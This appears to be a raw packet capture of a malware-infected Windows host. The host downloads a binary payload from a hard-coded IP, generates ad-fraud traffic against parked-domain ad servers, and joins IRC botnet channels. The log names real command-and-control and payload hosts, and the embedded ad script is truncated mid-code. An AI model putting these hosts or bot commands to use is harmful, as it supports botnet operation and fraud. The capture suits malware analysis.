Client: GET /p0127/2.0/w.bin?290491 HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 66.96.221.102Connection: Keep-Alive


VICTIM:  	\000\000x\343 
VICTIM:  	\000\000'\263\000\000\000\0302.0_ucsp0416_svchost.exe 
VICTIM:  	GET /p0127/2.0/w.bin?290491 HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 66.96.221.102Connection: Keep-Alive 
ATTACKER:	GET / HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: ispfinancing.comConnection: Keep-Alive 
ATTACKER:	GET /?3b7b6820 HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: ispfinancing.comConnection: Keep-Alive 
ATTACKER:	GET / HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: ispfinancing.comConnection: Keep-Alive 
ATTACKER:	GET /mz/godaddy_pop.js HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: panther1.cpxinteractive.comConnection: Keep-Alive 
ATTACKER:	GET /v8u2m5i8/cds/mz/godaddy_pop.js?dopvhost=panther1.cpxinteractive.com&doppl=df5878a9934cde4f931cde1fd60c6631931cde45&dopsig=79a8e9c1cab8f141731bb72ffb67a5b1 HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 209.197.7.116Connection: Keep-Alive 
ATTACKER:	GET /pixel.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: panther1.cpxinteractive.comConnection: Keep-AliveCookie: dopedge=142 
ATTACKER:	GET /st?ad_type=pop&ad_size=0x0§ion=791350&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: adserving.cpxinteractive.comConnection: Keep-Alive 
ATTACKER:	HTTP/1.0 200 OKDate: Sun, 13 Jun 2010 09:27:45 GMTServer: YTS/1.18.4P3P: policyref=\/w3c/p3p.xml\, CP=\NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA\Cache-Control: no-storeLast-Modified: Sun, 13 Jun 2010 09:27:45 GMTPragma: no-cacheContent-Length: 4385Age: 0/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url=\\;var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type=\\;rm_pop_frequency = 0; rm_pop_times = 1; rm_pop_nofreqcap = 1; rm_pop_id = 791350; rm_tag_type = \pop\; rm_url = \http:/adserving.cpxinteractive.com/imp?Z=0x0&y=29&s=791350&_salt=157855608\;var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(rm_crex_data.length>0){rm_url+=\&X=\;for(var i=0;i<\\/SCRIPT>';if(rm_pop_frequency){if(rmCanShowPop(rm_pop_id,rm_pop_times,rm_pop_frequency)||rm_pop_nofreqcap){document.write(rm_tag_src);}}else{document.write(rm_tag_src);}function cookiesEnabled(){var cookieEnabled=(navigator.cookieEnabled)?true:false;if(typeof navigator.cookieEnabled==\undefined\&&!cookieEnabled){document.cookie=\testcookie\;cookieEnabled=(document.cookie.indexOf(\testcookie\)!=-1)?true:false;}return cookieEnabled;}function rmGetCookie(Name){var search=Name+\=\;var CookieString=document.cookie;var result=null;if(CookieString.length>0){offset=CookieString.indexOf(search);if(offset!=-1){offset+=search.length;end=CookieString.indexOf(\;\,offset);if(end==-1){end=CookieString.length;}result=unescape(CookieString.substring(offset,end));}}return result;}function flashDetection(){var flash=new Object();flash.installed=false;flash.version='0.0';if(navigator.plugins&&navigator.plugins.length){for(x=0;x'); 
ATTACKER:	GET /v8u2m5i8/cds/pixel.gif?dopvhost=panther1.cpxinteractive.com&doppl=df5878a9934cde41931cde11d60c663c931ce349&dopsig=5fc631c319640518a52e55f0db511a9c HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Connection: Keep-AliveHost: 69.16.184.137 
ATTACKER:	GET /images/hdr_parked_ppc_4.png HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /imp?Z=0x0&y=29&s=791350&_salt=157855608&B=12&m=2&r=1 HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: adserving.cpxinteractive.comConnection: Keep-Alive 
ATTACKER:	GET /imp?Z=0x0&y=29&s=791350&_salt=157855608&B=12&m=2&r=1 HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: ad.yieldmanager.comConnection: Keep-Alive 
ATTACKER:	GET /ak/q.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: content.yieldmanager.comConnection: Keep-Alive 
ATTACKER:	GET /v2/cexposer/SIG=12je2pv6r/*http%3A/ad.yieldmanager.com/imp?Z=0x0&y=29&s=791350&_salt=157855608&B=12&m=2&r=1 HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: cookex.amp.yahoo.comConnection: Keep-Alive 
ATTACKER:	GET /imp?Z=0x0&y=29&s=791350&_salt=157855608&B=12&m=2&r=1&SIG=10v6ir6mt;x-cookie=11h3n6g61994v&o=4&f=pc HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: ad.yieldmanager.comConnection: Keep-Alive 
ATTACKER:	GET /rw?title=&qs=iframe3%3FAAAAADYTDACe4jgAAAAAADFXDwAAAAAAAgAAAAAAAAAAAP8AAAABA0Z0FwAAAAAA%2Dn8VAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtRQYAAAAAAAICAgAAAAAAAAAAAAAAAAAAAKDi3GACQAAAAAAAAAAAAABgJHChDkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2EGjHREoldCKSarzrP0zEiw7%2EwFT3cuGQ%2DK1kFAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fispfinancing%2Ecom%252F%2CZ%253D0x0%2526y%253D29%2526s%253D791350%2526%5Fsalt%253D157855608%2526B%253D12%2526m%253D2%2526r%253D1%2Ced259ece%2D76cd%2D11df%2D9d83%2D003048d732d8 HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: adserving.cpxinteractive.comConnection: Keep-Alive 
ATTACKER:	GET /apps/domainpark/show_afd_ads.js HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pagead2.googlesyndication.comConnection: Keep-Alive 
ATTACKER:	GET /iframe3?AAAAADYTDACe4jgAAAAAADFXDwAAAAAAAgAAAAAAAAAAAP8AAAABA0Z0FwAAAAAA-n8VAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtRQYAAAAAAAICAgAAAAAAAAAAAAAAAAAAAKDi3GACQAAAAAAAAAAAAABgJHChDkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.GjHREoldCKSarzrP0zEiw7.wFT3cuGQ-K1kFAAAAAA==,,http%3A%2F%2Fispfinancing.com%2F,Z%3D0x0%26y%3D29%26s%3D791350%26_salt%3D157855608%26B%3D12%26m%3D2%26r%3D1,ed259ece-76cd-11df-9d83-003048d732d8 HTTP/1.0Accept: */*Referer: http:/adserving.cpxinteractive.com/rw?title=&qs=iframe3%3FAAAAADYTDACe4jgAAAAAADFXDwAAAAAAAgAAAAAAAAAAAP8AAAABA0Z0FwAAAAAA%2Dn8VAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtRQYAAAAAAAICAgAAAAAAAAAAAAAAAAAAAKDi3GACQAAAAAAAAAAAAABgJHChDkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2EGjHREoldCKSarzrP0zEiw7%2EwFT3cuGQ%2DK1kFAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fispfinancing%2Ecom%252F%2CZ%253D0x0%2526y%253D29%2526s%253D791350%2526%5Fsalt%253D157855608%2526B%253D12%2526m%253D2%2526r%253D1%2Ced259ece%2D76cd%2D11df%2D9d83%2D003048d732d8Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: adserving.cpxinteractive.comConnection: Keep-Alive 
ATTACKER:	GET /iframe3?AAAAADYTDACe4jgAAAAAADFXDwAAAAAAAgAAAAAAAAAAAP8AAAABA0Z0FwAAAAAA-n8VAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtRQYAAAAAAAICAgAAAAAAAAAAAAAAAAAAAKDi3GACQAAAAAAAAAAAAABgJHChDkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.GjHREoldCKSarzrP0zEiw7.wFT3cuGQ-K1kFAAAAAA==,,http%3A%2F%2Fispfinancing.com%2F,Z%3D0x0%26y%3D29%26s%3D791350%26_salt%3D157855608%26B%3D12%26m%3D2%26r%3D1,ed259ece-76cd-11df-9d83-003048d732d8 HTTP/1.0Accept: */*Referer: http:/adserving.cpxinteractive.com/rw?title=&qs=iframe3%3FAAAAADYTDACe4jgAAAAAADFXDwAAAAAAAgAAAAAAAAAAAP8AAAABA0Z0FwAAAAAA%2Dn8VAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtRQYAAAAAAAICAgAAAAAAAAAAAAAAAAAAAKDi3GACQAAAAAAAAAAAAABgJHChDkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2EGjHREoldCKSarzrP0zEiw7%2EwFT3cuGQ%2DK1kFAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fispfinancing%2Ecom%252F%2CZ%253D0x0%2526y%253D29%2526s%253D791350%2526%5Fsalt%253D157855608%2526B%253D12%2526m%253D2%2526r%253D1%2Ced259ece%2D76cd%2D11df%2D9d83%2D003048d732d8Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: ad.yieldmanager.comConnection: Keep-AliveCookie: BX=11u3a6t61994i&b=4&s=cp&t=163; uid=uid=ed2598ca-76cd-11df-acbe-003048d732d8&_hmacv=1&_salt=2830954819&_keyid=k1&_hmac=d82b26ba85e498524a401d9df71a80cf5d250146 
ATTACKER:	GET /images/061703/spc_trans.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/img_orangearrows.png HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/img_saletag.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/img_gdlogo.png HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET / HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: ispfinancing.comConnection: Keep-AliveCookie: fc=fcVal=8158407465173802752 
ATTACKER:	GET /images/img_parkedfreetext_b.png HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/but_search.png HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/ad_ppc_affiliate.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/tp468x60_5.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/ban_199_5.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/061703/but_go_orange_green.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/co_2.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/dbs_2.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /assets/spc_trans.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: imagesak.godaddy.comConnection: Keep-Alive 
ATTACKER:	GET /aaa/help/hlp_toplft.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: imagesak.godaddy.comConnection: Keep-Alive 
ATTACKER:	GET /images/mrkt_250x80_4.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /aaa/help/hlp_top.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: imagesak.godaddy.comConnection: Keep-Alive 
ATTACKER:	GET /aaa/help/hlp_toprt.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: imagesak.godaddy.comConnection: Keep-Alive 
ATTACKER:	GET /images/ad_ppc_biz3.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /aaa/help/hlp_sidelft.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: imagesak.godaddy.comConnection: Keep-Alive 
ATTACKER:	GET /aaa/help/hlp_botlft.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: imagesak.godaddy.comConnection: Keep-Alive 
ATTACKER:	GET /aaa/help/hlp_sidert.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: imagesak.godaddy.comConnection: Keep-Alive 
ATTACKER:	GET /aaa/help/hlp_botrt.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: imagesak.godaddy.comConnection: Keep-Alive 
ATTACKER:	GET /images/tp250x80_5.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/log_icann.png HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /aaa/help/hlp_bot.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: imagesak.godaddy.comConnection: Keep-Alive 
ATTACKER:	GET /images/img_footertext2.png HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/bul_blacksquare.png HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/bul_bluesquare.png HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/log_me.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/ad_ppc_prodadv.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/ad_ppc_hosting.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/ad_ppc_wst.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	GET /images/ad_ppc_gdauctions.gif HTTP/1.0Accept: */*Referer: http:/ispfinancing.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: images-pw.secureserver.netConnection: Keep-Alive 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	NICK fyvgdzjqUSER g020500 . . :_ 
VICTIM:  	Service Pack 2JOIN &virtu